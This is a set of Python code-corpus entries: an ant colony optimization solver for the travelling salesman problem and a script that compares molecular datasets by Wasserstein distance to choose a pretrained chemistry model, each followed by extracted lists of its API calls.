import DataMapFunctions, Abstract\n'), ((2434, 2606), 'util.unit_convert', 'util.unit_convert', (['self.values'], {'unit_from_num': 'self.capacity_or_energy_unit', 'unit_from_den': 'self.time_unit', 'unit_to_num': 'model_energy_unit', 'unit_to_den': 'model_time_step'}), '(self.values, unit_from_num=self.capacity_or_energy_unit,\n unit_from_den=self.time_unit, unit_to_num=model_energy_unit,\n unit_to_den=model_time_step)\n', (2451, 2606), False, 'import util\n'), ((4308, 4387), 'util.object_att_from_table', 'util.object_att_from_table', (['self.sql_id_table', 'self.supply_node_id', 'primary_key'], {}), 
'(self.sql_id_table, self.supply_node_id, primary_key)\n', (4334, 4387), False, 'import util\n'), ((4481, 4525), 'datamapfunctions.DataMapFunctions.__init__', 'DataMapFunctions.__init__', (['self', 'data_id_key'], {}), '(self, data_id_key)\n', (4506, 4525), False, 'from datamapfunctions import DataMapFunctions, Abstract\n'), ((4630, 4706), 'util.remove_df_levels', 'util.remove_df_levels', (['self.raw_values', "['supply_node', 'supply_technology']"], {}), "(self.raw_values, ['supply_node', 'supply_technology'])\n", (4651, 4706), False, 'import util\n'), ((4814, 4901), 'datamapfunctions.Abstract.__init__', 'Abstract.__init__', (['self', 'self.id'], {'primary_key': 'primary_key', 'data_id_key': 'data_id_key'}), '(self, self.id, primary_key=primary_key, data_id_key=\n data_id_key)\n', (4831, 4901), False, 'from datamapfunctions import DataMapFunctions, Abstract\n'), ((6677, 6695), 'numpy.shape', 'np.shape', (['ref_sums'], {}), '(ref_sums)\n', (6685, 6695), True, 'import numpy as np\n'), ((6889, 6926), 'numpy.repeat', 'np.repeat', (['factors', 'num_techs'], {'axis': '(0)'}), '(factors, num_techs, axis=0)\n', (6898, 6926), True, 'import numpy as np\n'), ((7221, 7238), 'numpy.any', 'np.any', (['(sums == 0)'], {}), '(sums == 0)\n', (7227, 7238), True, 'import numpy as np\n'), ((8422, 8458), 'config.cfgfile.get', 'cfg.cfgfile.get', (['"""case"""', '"""time_step"""'], {}), "('case', 'time_step')\n", (8437, 8458), True, 'import config as cfg\n'), ((3687, 3764), 'util.expand_multi', 'util.expand_multi', (['self.values', 'needed_sales_share_levels', 'needed_sales_names'], {}), '(self.values, needed_sales_share_levels, needed_sales_names)\n', (3704, 3764), False, 'import util\n'), ((8532, 8704), 'util.unit_convert', 'util.unit_convert', (['self.values'], {'unit_from_num': 'self.capacity_or_energy_unit', 'unit_from_den': 'self.time_unit', 'unit_to_num': 'model_energy_unit', 'unit_to_den': 'model_time_step'}), '(self.values, unit_from_num=self.capacity_or_energy_unit,\n unit_from_den=self.time_unit, unit_to_num=model_energy_unit,\n unit_to_den=model_time_step)\n', (8549, 8704), False, 'import util\n'), ((5515, 5602), 'util.expand_multi', 'util.expand_multi', (['self.values', 'needed_sales_share_levels', 'needed_sales_share_names'], {}), '(self.values, needed_sales_share_levels,\n needed_sales_share_names)\n', (5532, 5602), False, 'import util\n'), ((2888, 2935), 'config.ureg.Quantity', 'cfg.ureg.Quantity', (['self.capacity_or_energy_unit'], {}), '(self.capacity_or_energy_unit)\n', (2905, 2935), True, 'import config as cfg\n'), ((3013, 3047), 'config.ureg.Quantity', 'cfg.ureg.Quantity', (['model_time_step'], {}), '(model_time_step)\n', (3030, 3047), True, 'import config as cfg\n'), ((8877, 8924), 'config.ureg.Quantity', 'cfg.ureg.Quantity', (['self.capacity_or_energy_unit'], {}), '(self.capacity_or_energy_unit)\n', (8894, 8924), True, 'import config as cfg\n'), ((9002, 9036), 'config.ureg.Quantity', 'cfg.ureg.Quantity', (['model_time_step'], {}), '(model_time_step)\n', (9019, 9036), True, 'import config as cfg\n')]
|
import numpy as np
import networkx as nx
import argparse
import random
from models.distance import get_dist_func
def get_fitness(solution, initial_node, node_list):
"""
Get fitness of solution encoded by permutation.
Args:
solution (numpy.ndarray): Solution encoded as a permutation
initial_node (int): Initial node in the permutation (equal to the first element - redundant)
node_list (list): List of node IDs in network
Returns:
(float): Fitness of specified solution
"""
# Append path back to initial node.
solution_aux = np.hstack((solution, initial_node))
# Compute fitness.
return np.sum([dist_func(node_list[el[0]], node_list[el[1]])
for el in [(solution_aux[idx], solution_aux[idx+1])
for idx in range(len(solution_aux)-1)]])
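# Added note: for a permutation such as [0, 3, 1, 2] with initial_node 0, the
# fitness is the closed tour length
#     d(n0, n3) + d(n3, n1) + d(n1, n2) + d(n2, n0),   ni = node_list[i],
# where dist_func is the module-level distance function assigned in the
# __main__ block below.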
def get_inv_dist_mat(node_list):
"""
    Get pairwise inverse-distance matrix for specified nodes in node list.
Args:
node_list (list): Nodes for which to compute the pairwise distances
Returns:
        (numpy.ndarray): Matrix of pairwise inverse distances
"""
# Initialize array.
dist_mat = np.zeros((len(node_list), len(node_list)), dtype=float)
    # Compute pairwise inverse distances
for idx1 in range(len(node_list)-1):
for idx2 in range(idx1+1, len(node_list)):
dist_mat[idx1, idx2] = dist_mat[idx2, idx1] = 1/dist_func(node_list[idx1], node_list[idx2])
    # Return the computed inverse-distance matrix.
return dist_mat
def aco(network, n_ants=100, max_it=500, rho=0.1, alpha=1.0, beta=1.0, q=1.0,
aug='relinking', p_mut=0.08, p_accept_worse=0.1, breeding_coeff=0.5):
"""
Perform ant colony optimization to estimate solution for travelling salesman problem.
Args:
network (object): Networkx representation of the graph
n_ants (int): Number of ants to use
max_it (int): Maximum number of iterations to perform
rho (float): Evaporation rate
alpha (float): Pheromone matrix power in transition probability matrix construction
beta (float): Inverse distance matrix power in transition probability matrix construction
q (float): Pheromone trail coefficient
aug (str): Algorithm augmentation to use. If None, use no augmentation. If equal to 'relinking' use path
relinking method. If equal to 'genetic' use replacement of worst ants with crossovers of best ants.
p_mut (float): Mutation probability
p_accept_worse (float): Probability of accepting a relinked solution that is worse than original.
breeding_coeff (float): Fraction of best ants to use in crossover and fraction of worst ants to
replace with offspring (genetic augmentation)
Returns:
(tuple): Best found solution, fitness of best solution, edgelists corresponding to solutions representing
the new global best solution.
"""
# Check aug parameter.
if aug is not None:
if aug not in {'relinking', 'genetic'}:
raise(ValueError('unknown value specified for aug parameter'))
# Initialize list for storing edge lists (for animating).
edgelists = []
# Initialize list of nodes (for converting enumerations to actual node IDs).
node_list = list(network.nodes())
# Set initial node.
initial_node = 0
    # Initialize best found solution.
best_solution = {
'fitness' : np.inf,
'solution' : None
}
# Compute distance matrix for locations.
inv_dist_mat = get_inv_dist_mat(node_list)
# Initialize pheromone matrix.
pher_mat = 0.01*np.ones_like(inv_dist_mat, dtype=float)
# Initialize iteration index.
it_idx = 0
# Main iteration loop.
while it_idx < max_it:
# Increment iteration counter.
it_idx += 1
# Print iteration index and best fitness.
print('iteration: {0}'.format(it_idx))
print('best fitness: {0}'.format(best_solution['fitness']))
# Initialize array for storing ant solutions.
ant_solutions = np.empty((n_ants, len(node_list)), dtype=int)
# Initialize array for storing ant fitness values.
ant_fitness_vals = np.empty(n_ants, dtype=float)
# Build transition probability matrix.
p_mat = (pher_mat**alpha) * (inv_dist_mat**beta)
# Run ACO step.
for ant_idx in range(n_ants):
# Set initial node.
current_node = initial_node
# Get set of unvisited nodes.
unvisited = set(range(len(node_list)))
unvisited.remove(initial_node)
# Build ant's solution.
solution_nxt = np.empty(len(node_list), dtype=int)
solution_nxt[0] = initial_node
for step_idx in range(len(node_list) - 1):
unvisited_list = list(unvisited)
probs = p_mat[current_node, unvisited_list] / np.sum(p_mat[current_node, unvisited_list])
node_nxt = np.random.choice(unvisited_list, size=1, p=probs)[0]
unvisited.remove(node_nxt)
solution_nxt[step_idx+1] = node_nxt
current_node = node_nxt
# Compute fitness of solution and compare to global best.
fitness_solution = get_fitness(solution_nxt, initial_node, node_list)
ant_fitness_vals[ant_idx] = fitness_solution
if fitness_solution < best_solution['fitness']:
best_solution['fitness'] = fitness_solution
best_solution['solution'] = solution_nxt
solution_nxt_aug = np.hstack((solution_nxt, initial_node))
# Store edge list (for animating).
edgelists.append([(node_list[solution_nxt_aug[idx]], node_list[solution_nxt_aug[idx+1]])
for idx in range(len(solution_nxt_aug) - 1)])
# Store ant's solution.
ant_solutions[ant_idx, :] = solution_nxt
# Initialize matrix for accumulating pheromones (for pheromone update).
pher_add_mat = np.zeros_like(pher_mat, dtype=float)
if aug == 'relinking':
# If using relinking augmentation.
# Go over solutions.
for idx_solution in range(ant_solutions.shape[0]):
# Split solution at random point.
sec1, sec2 = np.split(ant_solutions[idx_solution], \
indices_or_sections=[np.random.randint(1, len(ant_solutions[idx_solution]))])
# Relink.
solution_mod = np.hstack((sec1, list(reversed(sec2))))
# Apply mutation with probability.
if np.random.rand() < p_mut:
p1 = np.random.randint(0, len(solution_mod))
p2 = np.random.randint(0, len(solution_mod))
solution_mod[[p1, p2]] = solution_mod[[p2, p1]]
# Compute fitness value of relinked solution.
fitness_mod = get_fitness(solution_mod, initial_node, node_list)
# If fitness better accept. Also accept with specified probability.
if (fitness_mod < ant_fitness_vals[idx_solution]) or (np.random.rand() < p_accept_worse):
ant_solutions[idx_solution, :] = solution_mod
ant_fitness_vals[idx_solution] = fitness_mod
if aug == 'genetic':
# If using genetic augmentation.
# Sort ants ant fitness values from best to worst.
p = ant_fitness_vals.argsort()
ant_fitness_vals = ant_fitness_vals[p]
ant_solutions = ant_solutions[p, :]
# Get number of new ants and initialize array for crossovers.
            n_new_ants = int(np.ceil(breeding_coeff*ant_solutions.shape[0]))
            # offspring are produced in pairs below, so keep the count even (and at least 2)
            n_new_ants = max(2, n_new_ants - n_new_ants % 2)
ant_solutions_new = np.empty((n_new_ants, ant_solutions.shape[1]), dtype=int)
ant_fitness_vals_new = np.empty(ant_solutions_new.shape[0], dtype=float)
# Go over solutions for which to perform crossover.
for idx in range(0, ant_solutions_new.shape[0], 2):
# Get solutions and cut at random point.
ant_sol_1 = ant_solutions[idx, :]
ant_sol_2 = ant_solutions[idx+1, :]
c1 = ant_sol_1[:np.random.randint(1, len(ant_sol_1))]
c2 = ant_sol_2[:np.random.randint(1, len(ant_sol_2))]
# Append elements in second solution in order found.
offspring1 = np.hstack((c1, ant_sol_2[~np.in1d(ant_sol_2, c1)]))
offspring2 = np.hstack((c2, ant_sol_1[~np.in1d(ant_sol_1, c2)]))
# Apply mutations with specified probability.
if np.random.rand() < p_mut:
p1 = np.random.randint(0, len(offspring1))
p2 = np.random.randint(0, len(offspring1))
offspring1[[p1, p2]] = offspring1[[p2, p1]]
if np.random.rand() < p_mut:
p1 = np.random.randint(0, len(offspring2))
p2 = np.random.randint(0, len(offspring2))
offspring2[[p1, p2]] = offspring2[[p2, p1]]
# Set offspring and fitness values.
ant_solutions_new[idx, :] = offspring1
ant_solutions_new[idx+1, :] = offspring2
ant_fitness_vals_new[idx] = get_fitness(offspring1, initial_node, node_list)
ant_fitness_vals_new[idx+1] = get_fitness(offspring2, initial_node, node_list)
# Replace worst ants with offspring of best.
ant_solutions[-ant_solutions_new.shape[0]:] = ant_solutions_new
ant_fitness_vals[-len(ant_fitness_vals_new):] = ant_fitness_vals_new
# Compute and print diversity of solutions.
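        # Normalized spread of fitness values: 0 when the mean fitness equals the best, 1 when it equals the worst.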
diversity = (np.mean(ant_fitness_vals) - np.min(ant_fitness_vals))/(np.max(ant_fitness_vals) - np.min(ant_fitness_vals))
print(diversity)
# Add pheromones to pheromone accumulation matrix (for next iteration).
for idx_sol, solution in enumerate(ant_solutions):
for idx in range(len(solution)-1):
pher_add_mat[solution[idx], solution[idx+1]] += q*(1/ant_fitness_vals[idx_sol])
pher_add_mat[solution[idx+1], solution[idx]] += q*(1/ant_fitness_vals[idx_sol])
# Update pheromone matrix.
pher_mat = (1-rho)*pher_mat + pher_add_mat
    # Return the best found solution, its fitness value, and the list of edge lists (network states)
    # recorded on global best solution updates.
return best_solution['solution'], best_solution['fitness'], edgelists
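# Illustrative sketch (not part of the original script): the pheromone update above
# deposits q/fitness on both directions of every traversed edge and then evaporates
# the whole matrix by a factor of (1 - rho). The helper below is a hypothetical,
# self-contained demonstration of that rule on a tiny 3-node tour; it is defined
# for documentation only and never called.
def _pheromone_update_example():
    import numpy as np
    q, rho = 1.0, 0.1
    pher_mat = np.ones((3, 3))
    tour, fitness = [0, 1, 2], 10.0
    deposit = np.zeros_like(pher_mat)
    for i in range(len(tour) - 1):
        # Symmetric deposit, weighted by the inverse of the tour fitness.
        deposit[tour[i], tour[i + 1]] += q * (1 / fitness)
        deposit[tour[i + 1], tour[i]] += q * (1 / fitness)
    # Evaporation followed by deposition, as in the update above.
    return (1 - rho) * pher_mat + deposit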
if __name__ == '__main__':
### PARSE ARGUMENTS ###
parser = argparse.ArgumentParser(description='Approximate solution to TSP using ant colony optimization.')
parser.add_argument('--num-nodes', type=int, default=50, help='Number of nodes to use')
parser.add_argument('--dist-func', type=str, default='geodesic', choices=['geodesic', 'learned'],
help='Distance function to use')
parser.add_argument('--prediction-model', type=str, default='gboosting', choices=['gboosting', 'rf'],
help='Prediction model to use for learned distance function')
parser.add_argument('--max-it', type=int, default=100, help='Maximum iterations to perform')
parser.add_argument('--n-ants', type=int, default=100, help='Number of ants to use')
parser.add_argument('--rho', type=float, default=0.1, help='Evaporation rate parameter')
parser.add_argument('--alpha', type=float, default=1.0, help='Alpha parameter in transition probability matrix update')
parser.add_argument('--beta', type=float, default=1.0, help='Beta parameter in transition probability matrix update')
parser.add_argument('--q', type=float, default=1.0, help='Pheromone update coefficient')
parser.add_argument('--aug', type=str, default=None, choices=['relinking', 'genetic'], help='Augmentation to use')
parser.add_argument('--p-mut', type=float, default=0.08, help='Mutation rate (augmentation)')
parser.add_argument('--p-accept-worse', type=float, default=0.08,
help='Probability of accepting a worse result of relinking (relinking augmentation)')
parser.add_argument('--breeding-coeff', type=float, default=0.5,
                        help='Fraction of best solutions for which to perform crossover and fraction of worst solutions to replace with offspring (genetic augmentation)')
args = parser.parse_args()
#######################
# Parse problem network.
network = nx.read_gpickle('./data/grid_data/grid_network.gpickle')
# Number of nodes to remove from network.
to_remove = network.number_of_nodes() - args.num_nodes
# Remove randomly sampled nodes to get specified number of nodes.
network.remove_nodes_from(random.sample(list(network.nodes), to_remove))
# Get distance function.
dist_func = get_dist_func(network, which=args.dist_func, prediction_model=args.prediction_model)
# Get solution using ant colony optimization.
solution_position, solution_fitness, edgelists = aco(network, n_ants=args.n_ants, max_it=args.max_it, rho=args.rho,
alpha=args.alpha, beta=args.beta, q=args.q, aug=args.aug, p_mut=args.p_mut,
p_accept_worse=args.p_accept_worse, breeding_coeff=args.breeding_coeff)
# Save list of edge lists for animation.
np.save('./results/edgelists/edgelist_tsp_ac.npy', list(map(np.vstack, edgelists)))
nx.write_gpickle(network, './results/networks/network_tsp_ac.gpickle')
# Print best solution fitness.
print('Fitness of best found solution: {0:.3f}'.format(solution_fitness))
|
[
"numpy.ones_like",
"numpy.ceil",
"numpy.mean",
"numpy.random.rand",
"argparse.ArgumentParser",
"numpy.hstack",
"numpy.random.choice",
"numpy.in1d",
"models.distance.get_dist_func",
"numpy.max",
"numpy.sum",
"numpy.empty",
"numpy.min",
"networkx.read_gpickle",
"numpy.zeros_like",
"networkx.write_gpickle"
] |
[((601, 636), 'numpy.hstack', 'np.hstack', (['(solution, initial_node)'], {}), '((solution, initial_node))\n', (610, 636), True, 'import numpy as np\n'), ((10915, 11017), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Approximate solution to TSP using ant colony optimization."""'}), "(description=\n 'Approximate solution to TSP using ant colony optimization.')\n", (10938, 11017), False, 'import argparse\n'), ((12770, 12826), 'networkx.read_gpickle', 'nx.read_gpickle', (['"""./data/grid_data/grid_network.gpickle"""'], {}), "('./data/grid_data/grid_network.gpickle')\n", (12785, 12826), True, 'import networkx as nx\n'), ((13135, 13224), 'models.distance.get_dist_func', 'get_dist_func', (['network'], {'which': 'args.dist_func', 'prediction_model': 'args.prediction_model'}), '(network, which=args.dist_func, prediction_model=args.\n prediction_model)\n', (13148, 13224), False, 'from models.distance import get_dist_func\n'), ((13703, 13773), 'networkx.write_gpickle', 'nx.write_gpickle', (['network', '"""./results/networks/network_tsp_ac.gpickle"""'], {}), "(network, './results/networks/network_tsp_ac.gpickle')\n", (13719, 13773), True, 'import networkx as nx\n'), ((3643, 3682), 'numpy.ones_like', 'np.ones_like', (['inv_dist_mat'], {'dtype': 'float'}), '(inv_dist_mat, dtype=float)\n', (3655, 3682), True, 'import numpy as np\n'), ((4238, 4267), 'numpy.empty', 'np.empty', (['n_ants'], {'dtype': 'float'}), '(n_ants, dtype=float)\n', (4246, 4267), True, 'import numpy as np\n'), ((6160, 6196), 'numpy.zeros_like', 'np.zeros_like', (['pher_mat'], {'dtype': 'float'}), '(pher_mat, dtype=float)\n', (6173, 6196), True, 'import numpy as np\n'), ((7969, 8026), 'numpy.empty', 'np.empty', (['(n_new_ants, ant_solutions.shape[1])'], {'dtype': 'int'}), '((n_new_ants, ant_solutions.shape[1]), dtype=int)\n', (7977, 8026), True, 'import numpy as np\n'), ((8062, 8111), 'numpy.empty', 'np.empty', (['ant_solutions_new.shape[0]'], {'dtype': 'float'}), '(ant_solutions_new.shape[0], dtype=float)\n', (8070, 8111), True, 'import numpy as np\n'), ((5669, 5708), 'numpy.hstack', 'np.hstack', (['(solution_nxt, initial_node)'], {}), '((solution_nxt, initial_node))\n', (5678, 5708), True, 'import numpy as np\n'), ((7889, 7937), 'numpy.ceil', 'np.ceil', (['(breeding_coeff * ant_solutions.shape[0])'], {}), '(breeding_coeff * ant_solutions.shape[0])\n', (7896, 7937), True, 'import numpy as np\n'), ((10001, 10026), 'numpy.mean', 'np.mean', (['ant_fitness_vals'], {}), '(ant_fitness_vals)\n', (10008, 10026), True, 'import numpy as np\n'), ((10029, 10053), 'numpy.min', 'np.min', (['ant_fitness_vals'], {}), '(ant_fitness_vals)\n', (10035, 10053), True, 'import numpy as np\n'), ((10056, 10080), 'numpy.max', 'np.max', (['ant_fitness_vals'], {}), '(ant_fitness_vals)\n', (10062, 10080), True, 'import numpy as np\n'), ((10083, 10107), 'numpy.min', 'np.min', (['ant_fitness_vals'], {}), '(ant_fitness_vals)\n', (10089, 10107), True, 'import numpy as np\n'), ((4975, 5018), 'numpy.sum', 'np.sum', (['p_mat[current_node, unvisited_list]'], {}), '(p_mat[current_node, unvisited_list])\n', (4981, 5018), True, 'import numpy as np\n'), ((5046, 5095), 'numpy.random.choice', 'np.random.choice', (['unvisited_list'], {'size': '(1)', 'p': 'probs'}), '(unvisited_list, size=1, p=probs)\n', (5062, 5095), True, 'import numpy as np\n'), ((6773, 6789), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (6787, 6789), True, 'import numpy as np\n'), ((8871, 8887), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (8885, 
8887), True, 'import numpy as np\n'), ((9106, 9122), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (9120, 9122), True, 'import numpy as np\n'), ((7312, 7328), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (7326, 7328), True, 'import numpy as np\n'), ((8682, 8704), 'numpy.in1d', 'np.in1d', (['ant_sol_2', 'c1'], {}), '(ant_sol_2, c1)\n', (8689, 8704), True, 'import numpy as np\n'), ((8763, 8785), 'numpy.in1d', 'np.in1d', (['ant_sol_1', 'c2'], {}), '(ant_sol_1, c2)\n', (8770, 8785), True, 'import numpy as np\n')]
|
'''
Analytic Hierarchy Process, AHP.
Based on the Wasserstein distance
'''
from scipy.stats import wasserstein_distance
from sklearn.decomposition import PCA
import scipy
import numpy as np
import pandas as pd
import sys
import argparse
import os
import glob
import datasets_analysis_module as dam
class idx_analysis(object):
def __init__(self):
self.all_distribution_idx = {
'c': 0, 'C': 1, '(': 2, ')': 3, '1': 4, 'O': 5, '=': 6, '2': 7, 'N': 8, 'n': 9,
'3': 10, '[': 11, ']': 12, '@': 13, 'H': 14, 'F': 15, '-': 16, '4': 17, 'S': 18, 'Cl': 19,
'/': 20, 's': 21, 'o': 22, '.': 23, 'Br': 24, '5': 25, '+': 26, '#': 27, '\\': 28, '6': 29,
'I': 30, 'P': 31, 'Si': 32, '7': 33, '8': 34, 'B': 35, '%': 36, 'Na': 37, '9': 38, '0': 39,
'K': 40, 'Sn': 41, 'Se': 42, 'Li': 43, 'Zn': 44, 'Al': 45, 'b': 46, 'As': 47, 'Mg': 48, 'p': 49,
'Ca': 50, 'se': 51, 'Ag': 52, 'Te': 53, 'Ba': 54, 'Bi': 55, 'Rb': 56, 'Cs': 57, 'Sr': 58, 'te': 59,
'Be': 60, 'length': 61, 'symbol_type': 62
}
self.all_distribution_idx_reversed = {v: k for k, v in self.all_distribution_idx.items()}
def wasserstein_dis(distr_dict_0, distr_dict_1, dis_type='wasserstein'):
minus = 1e-15
sorted_keys_0 = np.sort(list(distr_dict_0.keys()))
max_value_0 = max(distr_dict_0.values())
values_0 = minus + np.array([distr_dict_0[k] for k in sorted_keys_0])/max_value_0
sorted_keys_1 = np.sort(list(distr_dict_1.keys()))
max_value_1 = max(distr_dict_1.values())
values_1 = minus + np.array([distr_dict_1[k] for k in sorted_keys_1])/max_value_1
if dis_type == 'wasserstein':
w_dis = wasserstein_distance(values_0, values_1)
elif dis_type == 'KL':
w_dis = np.mean(scipy.special.kl_div(values_0, values_1))
else:
w_dis = np.linalg.norm(np.array(values_0) - np.array(values_1))
return np.round(w_dis, 4)
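# Minimal usage sketch (hypothetical data, defined for documentation only and never
# called): wasserstein_dis expects two dictionaries mapping bins to counts; each is
# max-normalized (plus a tiny offset) before the chosen distance is computed.
def _wasserstein_dis_example():
    d0 = {0: 1, 1: 4, 2: 2}
    d1 = {0: 2, 1: 2, 2: 3}
    return wasserstein_dis(d0, d1, dis_type='wasserstein')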
def datasets_pair_analysis(
target_set_distribution,
pretrain_sets_distribution_path='PretrainedSetsDistribution.npy'
):
if not os.path.exists(pretrain_sets_distribution_path):
print(pretrain_sets_distribution_path, 'not the right file.')
        print('PretrainedSetsDistribution.npy cannot be found')
pretrained_sets_distribution = np.load(pretrain_sets_distribution_path, allow_pickle=True).item()
three_sets_prefix = ['c', 'cp', 'cpz']
all_wd_values = {k: {} for k in three_sets_prefix}
for i, prefix in enumerate(three_sets_prefix):
for j in range(63):
prefix_name = f"{prefix}-{j}"
all_wd_values[prefix][j] = wasserstein_dis(
target_set_distribution[str(j)],
pretrained_sets_distribution[prefix_name]
)
return all_wd_values
def rerange_distribution(target, combined_result):
distribute_dict = {}
if target == 'length':
min_len, max_len = 1, 256
distribute_dict = {k: 0 for k in range(min_len, max_len+1)}
for k, v in combined_result.items():
if k <= min_len:
distribute_dict[min_len] += v
elif k > min_len and k < max_len:
distribute_dict[k] = v
elif k >= max_len:
distribute_dict[max_len] += v
else:
                print('Unexpected key from combined_result (target: length).')
elif target == 'symbol_type':
min_len, max_len = 1, 61
distribute_dict = {k: 0 for k in range(min_len, max_len+1)}
for k, v in combined_result.items():
if k <= min_len:
distribute_dict[min_len] += v
elif k > min_len and k < max_len:
distribute_dict[k] = v
elif k >= max_len:
distribute_dict[max_len] += v
else:
                print('Unexpected key from combined_result (target: symbol_type).')
else:
distribute_dict = {k: 0 for k in [np.round(w, 2) for w in np.arange(0.0, 1.001, 0.01)]}
for k, v in combined_result.items():
if k in distribute_dict:
distribute_dict[k] += v
else:
                print('Unexpected key {:s} from combined_result (consider_symbol {:s}).'.format(str(k), target))
return distribute_dict
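# Hypothetical example (defined for documentation only and never called):
# rerange_distribution buckets a raw counts dict into the fixed support expected
# downstream; for the 'length' target, lengths below 1 or above 256 are folded
# into the boundary bins.
def _rerange_distribution_example():
    raw_counts = {0: 3, 5: 10, 300: 2}  # hypothetical sequence-length counts
    return rerange_distribution('length', raw_counts)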
def linear_ridgeclassifier(x, y):
from sklearn import linear_model
cla = linear_model.RidgeClassifier()
cla.fit(x, y)
return cla.score(x, y), cla.intercept_, cla
def data_norm(*args):
assert len(args) > 0, "Datasets' length needs > 0"
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
scaler.fit(np.vstack(args))
norm_args = [scaler.transform(args[i]) for i in range(len(args))]
norm_args = norm_args if len(args) > 1 else norm_args[0]
return norm_args
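# Hypothetical example (defined for documentation only and never called): data_norm
# fits a single StandardScaler on the stacked inputs so every array is normalized
# with the same statistics.
def _data_norm_example():
    import numpy as np
    a = np.array([[1.0, 2.0], [3.0, 4.0]])
    b = np.array([[5.0, 6.0]])
    a_norm, b_norm = data_norm(a, b)
    return a_norm, b_norm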
def main_get_dis_customized_dataset(file='./temp_data/bbbp.smi', num_workers=1):
# savename = 'wasserstein_temp.csv'
dataname = os.path.split(file)[-1].split('.')[0]
ahp = idx_analysis()
all_features = []
target_set_distribution = {}
for k, v in ahp.all_distribution_idx.items():
ta = dam.target_analysis(k)
if k == 'length':
specific_func = ta.length_analysis
elif k == 'symbol_type':
specific_func = ta.symbol_type_analysis
else:
specific_func = ta.symbol_analysis
combined_result = dam.parallel_operation(file, num_workers, specific_func)
distribute_dict = rerange_distribution(k, combined_result)
target_set_distribution[str(v)] = distribute_dict
all_wd_values = datasets_pair_analysis(
target_set_distribution,
pretrain_sets_distribution_path='PretrainedSetsDistribution.npy',
)
    # Concatenate the three pretraining-set distance blocks (c, cp, cpz) into a single 1 x (63*3) feature row.
for nd, (k, wd_dict) in enumerate(all_wd_values.items()):
all_features.append(list(wd_dict.values()))
final_features = pd.DataFrame(
np.reshape(all_features, [1, 63*3]), # (all_features),
index=[dataname],
columns=list(range(63*3)),
)
# final_features.to_csv(savename)
return final_features
def main_L2L(args):
filename = './wasserstein.csv' # This file contains the features used to train the decision model.
if not os.path.exists(filename):
print('No wasserstein.csv exists')
data_df = pd.read_csv(filename, header=0, index_col=0)
label = data_df['label'].values
features = data_df[[str(i) for i in range(np.shape(data_df.values)[-1]-1)]].values
# print(features.shape)
customized_dataset_feature = main_get_dis_customized_dataset(
file=args.input_dataset, num_workers=args.num_workers).values
all_features = np.vstack([features, customized_dataset_feature])
norm_all_features = data_norm(all_features)
features = norm_all_features[0: -1, :]
customized_dataset_feature = norm_all_features[-1, :]
all_score = []
all_inter = []
flag = 1
for redu_i in range(1, np.shape(features)[0]+1):
reducer = PCA(n_components=redu_i)
features_ = reducer.fit_transform(features)
score, inter_, model = linear_ridgeclassifier(features_, label)
all_score.append(score)
all_inter.append(inter_[0])
# print(redu_i, score)
if score - 1 == 0 and flag == 1:
customized_dataset_feature_ = reducer.transform(customized_dataset_feature[None, :])
get_scores = model.decision_function(customized_dataset_feature_)
# print(model.decision_function(features_))
flag = 0
# print(all_score)
# print(all_inter)
select_models = {0: 'model_chembl27', 1: 'model_chembl27_pubchem', 2: 'model_chembl27_pubchem_zinc'}
print(f'Select the pretrained {select_models[np.argmax(get_scores)]}, and the score is {np.max(get_scores)}')
def main(args):
main_L2L(args)
def parse_args(args):
parser = argparse.ArgumentParser(description='Datasets analysis')
parser.add_argument('--input_dataset', default='test.smi', type=str)
parser.add_argument('--num_workers', default=1, type=int)
args = parser.parse_args()
return args
def cli_main():
args = parse_args(sys.argv[1:])
# print(args)
main(args)
if __name__ == "__main__":
cli_main()
print('End!')
|
[
"pandas.read_csv",
"numpy.array",
"numpy.arange",
"os.path.exists",
"sklearn.linear_model.RidgeClassifier",
"numpy.reshape",
"argparse.ArgumentParser",
"sklearn.decomposition.PCA",
"numpy.max",
"os.path.split",
"scipy.stats.wasserstein_distance",
"numpy.vstack",
"numpy.round",
"datasets_analysis_module.target_analysis",
"numpy.argmax",
"numpy.shape",
"datasets_analysis_module.parallel_operation",
"scipy.special.kl_div",
"sklearn.preprocessing.StandardScaler",
"numpy.load"
] |
[((1918, 1936), 'numpy.round', 'np.round', (['w_dis', '(4)'], {}), '(w_dis, 4)\n', (1926, 1936), True, 'import numpy as np\n'), ((4358, 4388), 'sklearn.linear_model.RidgeClassifier', 'linear_model.RidgeClassifier', ([], {}), '()\n', (4386, 4388), False, 'from sklearn import linear_model\n'), ((4600, 4616), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (4614, 4616), False, 'from sklearn.preprocessing import StandardScaler\n'), ((6309, 6353), 'pandas.read_csv', 'pd.read_csv', (['filename'], {'header': '(0)', 'index_col': '(0)'}), '(filename, header=0, index_col=0)\n', (6320, 6353), True, 'import pandas as pd\n'), ((6661, 6710), 'numpy.vstack', 'np.vstack', (['[features, customized_dataset_feature]'], {}), '([features, customized_dataset_feature])\n', (6670, 6710), True, 'import numpy as np\n'), ((7865, 7921), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Datasets analysis"""'}), "(description='Datasets analysis')\n", (7888, 7921), False, 'import argparse\n'), ((1690, 1730), 'scipy.stats.wasserstein_distance', 'wasserstein_distance', (['values_0', 'values_1'], {}), '(values_0, values_1)\n', (1710, 1730), False, 'from scipy.stats import wasserstein_distance\n'), ((2079, 2126), 'os.path.exists', 'os.path.exists', (['pretrain_sets_distribution_path'], {}), '(pretrain_sets_distribution_path)\n', (2093, 2126), False, 'import os\n'), ((4632, 4647), 'numpy.vstack', 'np.vstack', (['args'], {}), '(args)\n', (4641, 4647), True, 'import numpy as np\n'), ((5122, 5144), 'datasets_analysis_module.target_analysis', 'dam.target_analysis', (['k'], {}), '(k)\n', (5141, 5144), True, 'import datasets_analysis_module as dam\n'), ((5390, 5446), 'datasets_analysis_module.parallel_operation', 'dam.parallel_operation', (['file', 'num_workers', 'specific_func'], {}), '(file, num_workers, specific_func)\n', (5412, 5446), True, 'import datasets_analysis_module as dam\n'), ((5901, 5938), 'numpy.reshape', 'np.reshape', (['all_features', '[1, 63 * 3]'], {}), '(all_features, [1, 63 * 3])\n', (5911, 5938), True, 'import numpy as np\n'), ((6225, 6249), 'os.path.exists', 'os.path.exists', (['filename'], {}), '(filename)\n', (6239, 